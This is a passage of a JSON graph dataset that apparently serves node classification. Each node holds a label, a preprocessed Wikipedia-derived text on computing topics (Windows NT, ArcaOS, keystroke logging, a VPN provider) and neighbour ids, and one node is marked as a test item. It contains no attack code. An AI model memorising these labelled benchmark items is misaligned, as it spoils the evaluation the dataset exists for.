      2062,
      6414,
      8082,
      1435,
      6558,
      5663,
      1952,
      3876,
      6437,
      5803,
      428,
      5165,
      5677,
      692,
      8502,
      3904,
      8000,
      1349,
      2374,
      8262,
      2505,
      8524,
      11599,
      7889,
      7896,
      11610,
      477,
      7775,
      6242,
      10083,
      7805,
      8554,
      2798,
      10991,
      9714,
      10739,
      3960,
      3705,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8974,
    "label": 4,
    "text": "Underground_(Dreyfus_book):underground dreyfus book underground tales hacking madness obsession electronic frontier 1997 book suelette dreyfus researched julian assange describes exploits group australian american british black hat hackers late 1980s early 1990s among assange book also mentions hackers contacts protagonists among erik bloodaxe legion doom corrupt masters deception first chapter underground relates diffusion reactions computer security community wank worm attacked dec vms computers decnet 1989 purportedly coded melbourne hacker book sold 10,000 copies author made electronic edition book freely available 2001 announced slashdot server housing book crashed due demand book reached 400,000 downloads within two years 2002 documentary realm hackers directed kevin anderson centered phoenix electron inspired book",
    "neighbors": [
      8612,
      2558,
      4435,
      3896,
      4956,
      4830
    ],
    "mask": "None"
  },
  {
    "node_id": 8975,
    "label": 2,
    "text": "The_Open_Group:open group open group industry consortium seeks enable achievement business objectives developing open vendor-neutral technology standards certifications 625 members provides number services including strategy management innovation research standards certification test development established 1996 x/open merged open software foundation open group certifying body unix trademark publishes single unix specification technical standard extends posix standards open group also develops manages togaf standard industry standard enterprise architecture framework 625 members include range vendors buyers well government agencies including example capgemini fujitsu oracle hpe orbus software ibm huawei philips u.s. department defense nasa obligation product developers vendors adopt standards developed association early 1990s major unix system vendors begun realize standards rivalries often called unix wars causing participants harm good leaving unix industry open emerging competition microsoft cose initiative 1993 considered first unification step merger open software foundation osf x/open 1996 ultimate step end skirmishes osf previously merged unix international 1994 meaning new entity effectively represented elements unix community time january 1997 responsibility x window system transferred open group defunct x consortium 1999 x.org formed manage x window system management services provided open group x.org members made number releases including x11r6.8 open group provided management services 2004 x.org open group worked together establish newly formed x.org foundation took control x.org domain name stewardship x window system see history x window system open group best-known services certification programs including certification products best practices posix north american state lotteries association naspl unix open group offers certifications professionals addition togaf certification covers tools services people certification open group also administers open group certified architect open ca program open group certified specialist open cits certification program latter skills experience based certification programs open group also offers certification archimate tools people well people certification open fair it4it open group provides platform members discuss requirements work jointly development adoption industry standards facilitate enterprise integration note open group documents available members especially development based area interest members join one semi-autonomous forums include members come together open group quarterly events member meetings open group also provides range services initial setup ongoing operational support collaboration standards best practices development assistance market impact activities assist organizations setting business objectives strategy procurement also provide certification test development includes services government agencies suppliers companies organizations set governments",
    "neighbors": [
      5888,
      5506,
      515,
      5636,
      5763,
      9733,
      9735,
      9858,
      7053,
      4750,
      5397,
      3222,
      1304,
      8984,
      6812,
      6813,
      7847,
      10024,
      429,
      7983,
      10672,
      9137,
      11567,
      2995,
      8499,
      5815,
      7356,
      10303,
      8260,
      1093,
      9542,
      1479,
      458,
      3659,
      716,
      2253,
      8522,
      6993,
      10068,
      8533,
      2775,
      9946,
      3552,
      4320,
      2786,
      6498,
      612,
      8545,
      1638,
      10465,
      4968,
      6120,
      8298,
      4333,
      5619,
      5492,
      8692,
      9204,
      9459,
      2168,
      6138,
      6651,
      5116,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 8976,
    "label": 3,
    "text": "Windows_NT:windows nt windows nt family operating systems produced microsoft first version released july 27 1993 processor-independent multiprocessing multi-user operating system first version windows nt windows nt 3.1 produced workstations server computers intended complement consumer versions windows based ms-dos including windows 1.0 windows 3.1x gradually windows nt family expanded microsoft general-purpose operating system product line personal computers deprecating windows 9x family nt formerly expanded new technology longer carries specific meaning starting windows 2000 nt removed product name included product version string nt first purely 32-bit version windows whereas consumer-oriented counterparts windows 3.1x windows 9x 16-bit/32-bit hybrids multi-architecture operating system initially supported several instruction set architectures including ia-32 mips dec alpha support powerpc itanium x64 arm added later latest versions support x86 specifically ia-32 x64 arm major features windows nt family include windows shell windows api native api active directory group policy hardware abstraction layer ntfs bitlocker windows store windows update hyper-v suggested dave cutler intended initialism wnt play vms incrementing letter one however project originally intended follow-on os/2 referred nt os/2 receiving windows brand one original nt developers mark lucovsky states name taken original target processor—the intel i860 code-named n10 n-ten 1998 question-and-answer session bill gates revealed letters previously expanded new technology longer carry specific meaning letters dropped names releases windows 2000 later though microsoft described product built nt technology main design goal nt hardware software portability various versions nt family operating systems released variety processor architectures initially ia-32 mips dec alpha powerpc itanium x86-64 arm supported later releases idea common code base custom hardware abstraction layer hal platform however support mips alpha powerpc later dropped windows 2000 broad software compatibility achieved support several api personalities including windows api posix os/2 apis – latter two phased starting windows xp partial ms-dos compatibility achieved via integrated dos virtual machine – although feature phased x86-64 architecture nt supported per-object file function role access control lists allowing rich set security permissions applied systems services nt supported windows network protocols inheriting previous os/2 lan manager networking well tcp/ip networking microsoft would implement tcp/ip stack derived first streams-based stack spider systems later rewritten in-house windows nt 3.1 first version windows use 32-bit flat virtual memory addressing 32-bit processors companion product windows 3.1 used segmented addressing switches 16-bit 32-bit addressing pages windows nt 3.1 featured core kernel providing system api running supervisor mode ring 0 x86 referred windows nt kernel mode platforms set user-space environments apis included new win32 environment os/2 1.3 text-mode environment posix environment full preemptive multitasking kernel could interrupt running tasks schedule tasks without relying user programs voluntarily give control cpu windows 3.1 windows applications although ms-dos applications preemptively multitasked windows starting windows/386 notably windows nt 3.x several i/o driver subsystems video printing user-mode subsystems windows nt 4 video server printer spooler subsystems moved kernel mode windows nt first gui strongly influenced programmatically compatible windows 3.1 windows nt 4 interface redesigned match brand new windows 95 moving program manager windows shell design ntfs journaled secure file system created nt windows nt also allows installable file systems starting versions 3.1 nt could installed fat hpfs file systems windows nt introduced driver model windows nt driver model incompatible older driver frameworks windows 2000 windows nt driver model enhanced become windows driver model first introduced windows 98 based nt driver model windows vista added native support windows driver foundation also available windows xp windows server 2003 extent windows 2000 microsoft decided create portable operating system compatible os/2 posix supporting multiprocessing october 1988 development started november 1989 windows nt known os/2 3.0 third version operating system developed jointly microsoft ibm ensure portability initial development targeted intel i860xr risc processor switching mips r3000 late 1989 intel i386 1990 microsoft also continued parallel development dos-based less resource-demanding windows environment resulting release windows 3.0 may 1990 windows 3 eventually successful microsoft decided change primary application programming interface still unreleased nt os/2 known extended os/2 api extended windows api decision caused tension microsoft ibm collaboration ultimately fell apart ibm continued os/2 development alone microsoft continued work newly renamed windows nt though neither operating system would immediately popular microsoft ms-dos windows products windows nt would eventually far successful os/2 microsoft hired group developers digital equipment corporation led dave cutler build windows nt many elements design reflect earlier dec experience cutler vms rsx-11 also unreleased object-based operating system developed dave cutler dec prism team joined selected members disbanded os/2 team including moshe dunie operating system designed run multiple instruction set architectures multiple hardware platforms within architecture platform dependencies largely hidden rest system kernel mode module called hal hardware abstraction layer windows nt kernel mode code distinguishes kernel whose primary purpose implement processor- architecture-dependent functions executive designed modified microkernel windows nt kernel influenced mach microkernel developed carnegie mellon university meet criteria pure microkernel kernel executive linked together single loaded module ntoskrnl.exe outside module little distinction kernel executive routines directly accessible example kernel-mode device drivers api sets windows nt family implemented subsystems atop publicly undocumented native api allowed late adoption windows api win32 subsystem windows nt one earliest operating systems use unicode internally windows nt 3.1 3.51 incorporated program manager file manager windows 3.1x series windows nt 4.0 onwards replaced programs windows explorer including taskbar start menu originally appeared windows 95 first release given version number 3.1 match contemporary 16-bit windows magazines era claimed number also used make version seem reliable .0 release also novell ipx protocol apparently licensed 3.1 versions windows software nt version number generally used marketing purposes still used internally said reflect degree changes core operating system however application compatibility reasons microsoft kept major version number 6 releases following vista changed later 10 windows 10 build number internal identifier used microsoft developers beta testers windows nt written c c++ small amount written assembly language c mostly used kernel code c++ mostly used user-mode code assembly language avoided possible would impede portability order prevent intel x86-specific code slipping operating system developers used developing x86 chips windows nt 3.1 initially developed using non-x86 development systems ported x86 architecture work initially based intel i860-based dazzle system later mips r4000-based jazz platform systems designed internally microsoft windows nt 3.1 released intel x86 pc compatible pc-98 dec alpha arc-compliant mips platforms windows nt 3.51 added support powerpc processor 1995 specifically prep-compliant systems ibm power series desktops/laptops motorola powerstack series despite meetings michael spindler bill gates power macintosh prep compliant power macintosh project failed ship intergraph corporation ported windows nt clipper architecture later announced intention port windows nt 3.51 sun microsystems sparc architecture neither version sold public retail product two windows nt 4.0 variants ia-32 alpha full set service packs available ports done third parties motorola intergraph etc publicly available updates windows nt 4.0 last major release support alpha mips powerpc though development windows 2000 alpha continued august 1999 compaq stopped support windows nt architecture three days later microsoft also canceled alphant program even though alpha nt 5 windows 2000 release reached rc1 status microsoft announced january 5 2011 next major version windows nt family include support arm architecture microsoft demonstrated preliminary version windows version 6.2.7867 running arm-based computer 2011 consumer electronics show eventually led commercial release windows 8-derived windows rt october 26 2012 implementation nt ce windows phone 8 according microsoft common misconception xbox xbox 360 use modified windows 2000 kernel xbox operating system built scratch implements subset windows apis 64-bit versions windows nt originally intended run itanium dec alpha latter used internally microsoft early development 64-bit windows continued time microsoft publicly announced cancelling plans ship 64-bit windows alpha alpha versions windows nt 32-bit windows 2000 supports intel ia-32 32-bit windows xp server 2003 server 2008 server 2008 r2 one edition dedicated itanium-based systems comparison itanium microsoft adopted x64 greater scale every version windows since windows xp dedicated x64 edition x64 editions minimum hardware specification required run release professional workstation version windows nt fairly slow-moving 6.0 vista release requires minimum 15 gb free disk space 10-fold increase free disk space alone previous version",
    "neighbors": [
      6148,
      4104,
      2058,
      13,
      8214,
      2071,
      10273,
      2101,
      6213,
      8262,
      10310,
      10322,
      8275,
      93,
      10338,
      8296,
      6250,
      8299,
      6252,
      8301,
      6265,
      8315,
      2179,
      2180,
      4228,
      10378,
      2193,
      10387,
      2196,
      6297,
      2212,
      2221,
      178,
      2231,
      8379,
      6345,
      4305,
      2259,
      4309,
      215,
      4316,
      224,
      8423,
      10473,
      10476,
      4333,
      242,
      6402,
      270,
      8482,
      294,
      2345,
      6441,
      315,
      6462,
      321,
      10561,
      2380,
      6476,
      2391,
      4439,
      2395,
      10590,
      2399,
      2401,
      2409,
      8556,
      6521,
      8576,
      6529,
      8578,
      2452,
      6550,
      4505,
      4506,
      10658,
      4515,
      426,
      2493,
      467,
      477,
      4590,
      2545,
      499,
      8700,
      6652,
      518,
      8711,
      2568,
      6664,
      6674,
      537,
      10780,
      542,
      6697,
      2610,
      576,
      582,
      2630,
      10839,
      4699,
      8798,
      10850,
      4712,
      621,
      2672,
      6772,
      10872,
      636,
      637,
      639,
      641,
      6787,
      651,
      6797,
      10896,
      10900,
      10910,
      4771,
      6820,
      6827,
      700,
      2748,
      2749,
      6846,
      6854,
      10956,
      10957,
      4815,
      2768,
      6879,
      736,
      4841,
      10989,
      757,
      11007,
      11011,
      4870,
      6921,
      780,
      11030,
      8985,
      6942,
      808,
      11058,
      2887,
      6984,
      9033,
      4948,
      11093,
      7000,
      11103,
      9060,
      2919,
      11112,
      11123,
      894,
      2942,
      2943,
      4998,
      5000,
      5003,
      908,
      11149,
      2959,
      7057,
      9114,
      929,
      7087,
      11184,
      2995,
      7095,
      954,
      7106,
      965,
      3014,
      5062,
      9166,
      9173,
      5080,
      7134,
      9194,
      11245,
      5103,
      11249,
      7187,
      11283,
      11301,
      5158,
      7207,
      7215,
      7234,
      3142,
      1098,
      7244,
      3169,
      5221,
      5225,
      9332,
      5237,
      1148,
      3197,
      9340,
      7307,
      7317,
      9374,
      7329,
      3235,
      5293,
      3250,
      5318,
      3276,
      3289,
      9434,
      1247,
      3304,
      9448,
      5356,
      5358,
      5363,
      3323,
      5371,
      5380,
      5397,
      5401,
      5406,
      11570,
      9525,
      3382,
      5435,
      9557,
      11605,
      1399,
      9593,
      7554,
      7558,
      3463,
      7561,
      3474,
      5523,
      3477,
      7573,
      3484,
      3487,
      3496,
      9647,
      7603,
      7605,
      9655,
      7615,
      9665,
      9671,
      9694,
      5600,
      1509,
      1513,
      1515,
      7663,
      9723,
      9742,
      9762,
      1581,
      7728,
      5686,
      7739,
      9791,
      7754,
      9817,
      1632,
      7789,
      9840,
      7796,
      9846,
      5754,
      7804,
      7806,
      5769,
      3723,
      1676,
      7836,
      1703,
      7847,
      9910,
      5840,
      5844,
      1757,
      3818,
      9964,
      5873,
      1782,
      1791,
      3856,
      3857,
      10001,
      1813,
      3867,
      10016,
      5928,
      10024,
      7983,
      3890,
      1844,
      10051,
      3937,
      3945,
      10104,
      10110,
      8065,
      3970,
      8069,
      8080,
      8098,
      8103,
      10155,
      1964,
      6069,
      10177,
      6087,
      8135,
      4051,
      8161,
      4074,
      6128,
      6129,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8977,
    "label": 3,
    "text": "ArcaOS:arcaos arcaos operating system developed marketed arca noae llc derived os/2 based last release ibm development continues stated goal add wider compatibility modern computing platforms including uefi gpt support limited pae support ram excess 4 gb utilized ram disk utilizing smp kernel supports 64 physical cpus real cpu cores hyper-threading recommended arcaos 32-bit operating system runs x86 processor architecture real virtualized arcaos based ibm os/2 warp 4.52 also known merlin convenience pack 2 mcp2 arcaos 5.0.3 acpi 6.2a-compliant acpica 20180508 arcaos compatible x86-based personal computers including portables desktops servers availability traditional bios case uefi-based systems complete csm arcaos includes device drivers number network adapters either using arca noae multimac technology employs freebsd driver code older ibm third-party-supplied drivers selection genmac drivers support wireless networking somewhat limited though multimac support select chipsets planned arcaos supports usb 2.0 connectivity development usb 3.0 driver ongoing audio support utilizes uniaud generic audio driver maintained arca noae uniaud based alsa addition selection device-specific drivers included os distribution video support provided panorama generic unaccelerated vesa driver snap accelerated video driver acceleration supported limited number graphics chipsets features zooming multi-head also available limited number chipsets snap lacks support many modern chipsets though support additional chips planned storage drivers available ide ahci select number scsi adapters supported nvme driver yet available arcaos includes capable dos vdm ships modified version windows 3.11 winos2 capable running 16-bit windows applications also capable running 32-bit windows applications utilizing odin project based part wine addition ported native os/2 code linux applications quite common well qt applications ported linux qt applications included distribution may installed rpm packages several available yum repositories openjdk 6 included arcaos capable running wide range java applications heimdal kerberos authentication client included arcaos distribution based 1.5.3 heimdal code arcaos native file system jfs though hpfs also supported os may booted either filesystem fat12 fat16 fat32 also supported using either kernel fat driver ifs driver arcaos supports several file systems use additional ifs drivers cdfs udf netdrive os/2 provides access samba 4 shares via ifs driver arcaos distribution includes limited license version netdrive fully licensed version capable mounting number local native foreign file systems arcaos formally announced october 23 2015 warpstock 2015 event os/2 ecomstation user group event code name blue lion arca noae managing member lewis rosenthal planned features blue lion announced time warpstock 2015 conference initial release projected late third quarter 2016 arca noae also stated actual release date set pre-orders arcaos ever taken announced name arcaos first published tech republic article may 26 2016 arcaos.com domain registered december 20 2015 tech republic article lewis rosenthal quoted saying first release arcaos would version 5.0 follows onto last release os/2 warp ibm 4.52 also stated arcaos 5.1 provide french spanish italian german dutch versions operating system arcaos 5.0 code name blue lion released may 15 2017 two editions released commercial edition intended enterprise use including 12 months upgraded/prioritized technical support personal edition targeted non-business users including six months standard technical support reduced price pricing listed 229 per license commercial edition 129 per license personal edition 99 promotional price effect first 90 days following release 9 july 2017 arcaos 5.0.1 released contained fixes installer arca noae current drivers ahci driver updated along multimac fix virtualpc use ibm ’ smouse driver version 5.0.2 arcanoae added usb booting support allowing os/2 boot usb media addition optical media version 5.0.2 released february 10 2018 19 august 2018 version 5.0.3 released included several updates bundled drivers programs 21 july 2019 version 5.0.4 released introduced new updater feature allowing arcaos installations upgraded latest release without reinstalling operating system",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      10333,
      1632,
      97,
      8298,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      7313,
      9366,
      6296,
      7325,
      9887,
      3248,
      6837,
      8388,
      9932,
      5840,
      7382,
      8410,
      1253,
      5363,
      2811,
      3323,
      10499,
      1804,
      273,
      11539,
      10016,
      5413,
      2345,
      7983,
      9525,
      823,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      10590,
      8551,
      11631,
      5492,
      6529,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      6062,
      11184,
      10675,
      8628,
      6075,
      6078,
      9151,
      8136,
      7626,
      6098,
      1515,
      6128,
      499,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 8978,
    "label": 4,
    "text": "Keystroke_logging:keystroke logging keystroke logging often referred keylogging keyboard capturing action recording logging keys struck keyboard typically covertly person using keyboard unaware actions monitored data retrieved person operating logging program keylogger either software hardware programs legal many designed allow employers oversee use computers keyloggers often used purpose stealing passwords confidential information keylogging also used study human–computer interaction numerous keylogging methods exist range hardware software-based approaches acoustic analysis software-based keyloggers computer programs designed work target computer software keyloggers used organizations troubleshoot technical problems computers business networks families business people use keyloggers legally monitor network usage without users direct knowledge even microsoft publicly admitted windows 10 operation system built-in keylogger final version “ improve typing writing services ” however malicious individuals use keyloggers public computers steal passwords credit card information keyloggers stopped https encryption protects data transit computers thus threat user computer technical perspective several categories keystroke logging established research method study writing processes different programs developed collect online process data writing activities including inputlog scriptlog translog keystroke logging legitimately used suitable research instrument number writing contexts include studies cognitive writing processes include keystroke logging used research writing specifically also integrated educational domains second language learning programming skills typing skills software keyloggers may augmented features capture user information without relying keyboard key presses sole input features include hardware-based keyloggers depend upon software installed exist hardware level computer system mid 1970s soviet union developed deployed hardware keylogger targeting typewriters termed selectric bug measured movements print head ibm selectric typewriters via subtle influences regional magnetic field caused rotation movements print head early keylogger written perry kivolowitz posted usenet news group net.unix-wizards net.sources november 17 1983 posting seems motivating factor restricting access /dev/kmem unix systems user-mode program operated locating dumping character lists clists assembled unix kernel 1970s spies installed keystroke loggers us embassy consulate buildings moscow installed bugs selectric ii selectric iii electric typewriters soviet embassies used manual typewriters rather electric typewriters classified information—apparently immune bugs 2013 russian special services still use typewriters writing simple software applications keylogging trivial like nefarious computer program distributed trojan horse part virus trivial attacker however installing covert keystroke logger without getting caught downloading data logged without traced attacker manually connects host machine download logged keystrokes risks traced trojan sends keylogged data fixed e-mail address ip address risks exposing attacker researchers devised several methods solving problem presented deniable password snatching attack keystroke logging trojan installed using virus worm 2000 fbi used flashcrest ispy obtain pgp passphrase nicodemo scarfo jr. son mob boss nicodemo scarfo also 2000 fbi lured two suspected russian cyber criminals us elaborate ruse captured usernames passwords keylogger covertly installed machine used access computers russia fbi used credentials hack suspects computers russia order obtain evidence prosecute effectiveness countermeasures varies keyloggers use variety techniques capture data countermeasure needs effective particular data capture technique case windows 10 keylogging microsoft enough change privacy settings computer example on-screen keyboard effective hardware keyloggers transparency defeat some—but all—screenloggers anti-spyware application disable hook-based keyloggers ineffective kernel-based keyloggers also keylogger program authors may able update code adapt countermeasures may proven effective anti-keylogger piece software specifically designed detect keyloggers computer typically comparing files computer database keyloggers looking similarities might signal presence hidden keylogger anti-keyloggers designed specifically detect keyloggers potential effective conventional antivirus software antivirus software consider keylogger virus circumstances keylogger considered legitimate piece software rebooting computer using live cd write-protected live usb possible countermeasure software keyloggers cd clean malware operating system contained secured fully patched infected soon started booting different operating system impact use hardware bios based keylogger many anti-spyware applications able detect software based keyloggers quarantine disable cleanse however many keylogging programs legitimate pieces software circumstances anti spyware often neglects label keylogging programs spyware virus applications able detect software-based keyloggers based patterns executable code heuristics keylogger behaviours use hooks certain apis software-based anti-spyware application 100 effective keyloggers also software-based anti-spyware defeat non-software keyloggers example hardware keyloggers attached keyboards always receive keystrokes software-based anti-spyware application however particular technique anti-spyware application uses influence potential effectiveness software keyloggers general rule anti-spyware applications higher privileges defeat keyloggers lower privileges example hook-based anti-spyware application defeat kernel-based keylogger keylogger receive keystroke messages anti-spyware application could potentially defeat hook- api-based keyloggers network monitors also known reverse-firewalls used alert user whenever application attempts make network connection gives user chance prevent keylogger phoning home typed information automatic form-filling programs may prevent keylogging removing requirement user type personal details passwords using keyboard form fillers primarily designed web browsers fill checkout pages log users accounts user account credit card information entered program automatically entered forms without ever using keyboard clipboard thereby reducing possibility private data recorded however someone physical access machine may still able install software able intercept information elsewhere operating system transit network transport layer security tls reduces risk data transit may intercepted network sniffers proxy tools using one-time passwords may keylogger-safe password invalidated soon used solution may useful someone using public computer however attacker remote control computer simply wait victim enter his/her credentials performing unauthorised transactions behalf session active use smart cards security tokens may improve security replay attacks face successful keylogging attack accessing protected information would require hardware security token well appropriate password/passphrase knowing keystrokes mouse actions display clipboard etc used one computer subsequently help attacker gain access protected resource security tokens work type hardware-assisted one-time password system others implement cryptographic challenge-response authentication improve security manner conceptually similar one time passwords smartcard readers associated keypads pin entry may vulnerable keystroke logging so-called supply chain attack attacker substitutes card reader/pin entry hardware one records user pin on-screen keyboards on-screen keyboard comes windows xp send normal keyboard event messages external target program type text software key loggers log typed characters sent one program another additionally keylogging software take screenshots displayed screen periodically and/or upon mouse click means although certainly useful security measure on-screen keyboard protect keyloggers keystroke interference software also available programs attempt trick keyloggers introducing random keystrokes although simply results keylogger recording information needs attacker task extracting keystrokes interest—the security mechanism specifically well stands cryptanalysis unclear similar on-screen keyboards speech-to-text conversion software also used keyloggers since typing mouse movements involved weakest point using voice-recognition software may software sends recognized text target software recognition took place also many pdas lately tablet pcs already convert pen also called stylus movements touchscreens computer understandable text successfully mouse gestures use principle using mouse movements instead stylus mouse gesture programs convert strokes user-definable actions typing text similarly graphics tablets light pens used input gestures however less common everyday potential weakness speech recognition applies technique well help many programs seemingly meaningless text expanded meaningful text time context-sensitively e.g en.wikipedia.org expanded web browser window focus biggest weakness technique programs send keystrokes directly target program however overcome using 'alternating technique described i.e sending mouse clicks non-responsive areas target program sending meaningless keys sending another mouse click target area e.g password field switching back-and-forth alternating typing login credentials typing characters somewhere else focus window cause keylogger record information need although could easily filtered attacker similarly user move cursor using mouse typing causing logged keystrokes wrong order e.g. typing password beginning last letter using mouse move cursor subsequent letter lastly someone also use context menus remove cut copy paste parts typed text without using keyboard attacker able capture parts password larger key space attack chose execute brute-force attack another similar technique uses fact selected text portion replaced next key typed e.g. password secret one could type dummy keys asdfsd dummies could selected mouse next character password e typed replaces dummies asdfsd techniques assume incorrectly keystroke logging software directly monitor clipboard selected text form take screenshot every time keystroke mouse click occurs may however effective hardware keyloggers",
    "neighbors": [
      3072,
      5636,
      10245,
      6,
      10756,
      9227,
      13,
      9233,
      9745,
      1557,
      9242,
      4637,
      7710,
      9761,
      2084,
      3620,
      9256,
      9771,
      3629,
      10801,
      5172,
      9781,
      8247,
      10297,
      3643,
      7739,
      9791,
      1088,
      4165,
      4689,
      8281,
      8283,
      8797,
      4198,
      107,
      10348,
      6254,
      4725,
      10872,
      5245,
      5246,
      1150,
      6786,
      5764,
      647,
      9356,
      6797,
      4245,
      10392,
      1690,
      2714,
      5281,
      2213,
      7855,
      7354,
      700,
      3262,
      8387,
      7364,
      7368,
      5325,
      10963,
      7893,
      2262,
      6360,
      5337,
      3290,
      4314,
      9440,
      2275,
      8932,
      6373,
      2796,
      1781,
      4344,
      3320,
      10492,
      5373,
      4863,
      1279,
      9983,
      4356,
      9488,
      7441,
      8978,
      4883,
      278,
      790,
      3350,
      4374,
      3867,
      4892,
      5404,
      8998,
      300,
      3887,
      5935,
      5433,
      10557,
      3395,
      9550,
      4435,
      7515,
      4444,
      4956,
      9569,
      5986,
      3941,
      11621,
      877,
      1393,
      5492,
      9591,
      9594,
      2430,
      899,
      7044,
      7556,
      9607,
      1930,
      9102,
      3473,
      9617,
      917,
      1941,
      3996,
      10141,
      2975,
      5024,
      3490,
      939,
      9646,
      3505,
      1970,
      4023,
      1978,
      6588,
      8638,
      3525,
      9160,
      6091,
      2508,
      7635,
      10708,
      7639,
      3032,
      9688,
      9695,
      9187,
      1515,
      11244,
      4595,
      6643,
      6644,
      5110,
      8694,
      2041,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8979,
    "label": 1,
    "text": "Federated_database_system:federated database system federated database system type meta-database management system dbms transparently maps multiple autonomous database systems single federated database constituent databases interconnected via computer network may geographically decentralized since constituent database systems remain autonomous federated database system contrastable alternative sometimes daunting task merging several disparate databases federated database virtual database composite constituent databases federated database system actual data integration constituent disparate databases result data federation data abstraction federated database systems provide uniform user interface enabling users clients store retrieve data multiple noncontiguous databases single query—even constituent databases heterogeneous end federated database system must able decompose query subqueries submission relevant constituent dbmss system must composite result sets subqueries various database management systems employ different query languages federated database systems apply wrappers subqueries translate appropriate query languages mcleod heimbigner among first define federated database system mid 1980s fdbs one define architecture interconnect databases minimize central authority yet support partial sharing coordination among database systems description might accurately reflect mcleod/heimbigner definition federated database rather description fits mcleod/heimbigner called composite database mcleod/heimbigner federated database collection autonomous components make data available members federation publication export schema access operations unified central schema encompasses information available members federation among surveys practitioners define federated database collection cooperating component systems autonomous possibly heterogeneous three important components fdbs autonomy heterogeneity distribution another dimension also considered networking environment computer network e.g. many dbss lan many dbss wan update related functions participating dbss e.g. updates nonatomic transitions atomic updates dbms classified either centralized distributed centralized system manages single database distributed manages multiple databases component dbs dbms may centralized distributed multiple dbs mdbs classified two types depending autonomy component dbs federated non federated nonfederated database system integration component dbms autonomous federated database system consists component dbs autonomous yet participate federation allow partial controlled sharing data federated architectures differ based levels integration component database systems extent services offered federation fdbs categorized loosely tightly coupled systems multiple dbs fdbs specific type characterized along three dimensions distribution heterogeneity autonomy another characterization could based dimension networking example single databases multiple databases lan wan distribution data fdbs due existence multiple dbs fdbs built data distributed among multiple databases could stored single computer multiple computers computers could geographically located different places interconnected network benefits data distribution help increased availability reliability well improved access times heterogeneities databases arise due factors differences structures semantics data constraints supported query language differences structure occur two data models provide different primitives object oriented oo models support specialization inheritance relational models differences due constraints occur two models support two different constraints example set type codasyl schema may partially modeled referential integrity constraint relationship schema codasyl supports insertion retention captured referential integrity alone query language supported one dbms also contribute heterogeneity component dbmss example differences query languages data models different versions query languages could contribute heterogeneity semantic heterogeneities arise disagreement meaning interpretation intended use data schema data level classification possible heterogeneities include creating federated schema one resolve heterogeneities integrating component db schemas dealing incompatible data types query syntax obstacle concrete implementation fdbs systems planned top-down generic problem lies matching semantically equivalent differently named parts different schemas =data models tables attributes pairwise mapping n attributes would result formula_1 mapping rules given equivalence mappings number quickly gets large practical purposes common way provide global schema comprises relevant parts member schemas provide mappings form database views two principal approaches depend direction mapping examples data integration called schema matching problem fundamental difference mdbs fdbs concept autonomy important understand aspects autonomy component databases addressed component dbs participates fdbs four kinds autonomies addressed heterogeneities fdbs primarily due design autonomy ansi/x3/sparc study group outlined three level data description architecture components conceptual schema internal schema external schema databases three level architecture however inadequate describing architectures fdbs therefore extended support three dimensions fdbs namely distribution autonomy heterogeneity five level schema architecture explained heterogeneity autonomy requirements pose special challenges concerning concurrency control fdbs crucial correct execution concurrent transactions see also global concurrency control achieving global serializability major correctness criterion requirements characterized difficult unsolved commitment ordering introduced 1991 provided general solution issue see global serializability see commitment ordering also architectural aspects solution five level schema architecture includes following accurately representing state art data integration five level schema architecture suffer major drawback namely imposed look feel modern data users demand control data presented needs somewhat conflict bottom-up approaches data integration",
    "neighbors": [
      10632,
      8201,
      4490,
      7180,
      2068,
      10389,
      7446,
      11030,
      2456,
      1049,
      5658,
      5403,
      9112,
      7581,
      10137,
      4255,
      9248,
      9631,
      9634,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      49,
      9397,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      2246,
      9286,
      2632,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      4065,
      10849,
      9828,
      6629,
      10340,
      10471,
      8808,
      6124,
      2669,
      6383,
      2544,
      10737,
      11377,
      9075,
      756,
      7412,
      1146,
      3196
    ],
    "mask": "None"
  },
  {
    "node_id": 8980,
    "label": 4,
    "text": "HideMyAss!:hidemyass hidemyass hma virtual private network vpn provider founded 2005 united kingdom subsidiary czech cybersecurity company avast since 2016 hidemyass created 2005 norfolk england jack cator time cator sixteen years-old created hma order circumvent restrictions school accessing games music network according cator first hidemyass service created hours using open-source code first product free website users typed url delivered website user browser cator promoted tool online forums featured front page digg attracting one thousand users cator incorporated ads hma take venture capital funding generated 1,000 2,000 per month founder went college pursue degree computer science 2009 cator dropped college focus hma added paid vpn service early hma employees freelancers found odesk.com 2012 one freelancers set-up competing business hma responded hiring contractors full-time employees establishing physical offices london 2012 united kingdom government sent hidemyass court order demanding provide information cody andrew kretsinger use hma service hack sony member lulzsec hacking group hma provided information authorities hma said violation company terms use use software illegal activities 2013 hma added software anonymize internet traffic mobile devices first added 2013 2014 company introduced hidemyphone service allowed mobile phone users make calls appear come different location 2014 service 10 million users 215,000 paying subscribers vpn service made £11 million revenue year hma 100 staff established international offices belgrade kiev 2015 hma became one largest vpn providers may 2015 acquired avg technologies 40 million became part avast 2016 acquisition avg technologies 2017 security vulnerability discovered allowed hackers access user laptop obtain elevated privileges device 2019 reported hma received directive russian authorities join state sponsored registry banned websites would prevent russian hma users circumventing russian state censorship hma reportedly given one month comply face blocking russian authorities hidemyass provides digital software services intended help users remain anonymous online encrypt online traffic software used access websites may blocked user country anonymize information could otherwise used hackers something unscrupulous without identified hma privacy policy terms use prohibit using illegal activity hma hides user ip address identifying information routing user internet traffic remote server however experts note company log connection data including originating ip address duration vpn session amount bandwidth used may 2018 company 830 servers 280 locations across globe provided 3000 ip addresses 2015 review tom hardware said hidemyass easy use good customer service large number server locations choose criticized slowing internet speeds contrast digital trends said hidemyass strong speeds good server selection n't full-proof ensuring anonymity stored user activity logs 2017 pc world noted difficult measure effect vpn service internet speed variables like location internet service speeds hardware 2016 review pc magazine gave hma android app 3 5 stars praised hma server selection user interface criticized price speed lack advanced features 2018 pc magazine gave similar feedback hma vpn service pc world ’ 2017 review also praised hma simple user interface criticized lack advanced features saying software ideal casual users need advanced configuration options",
    "neighbors": [
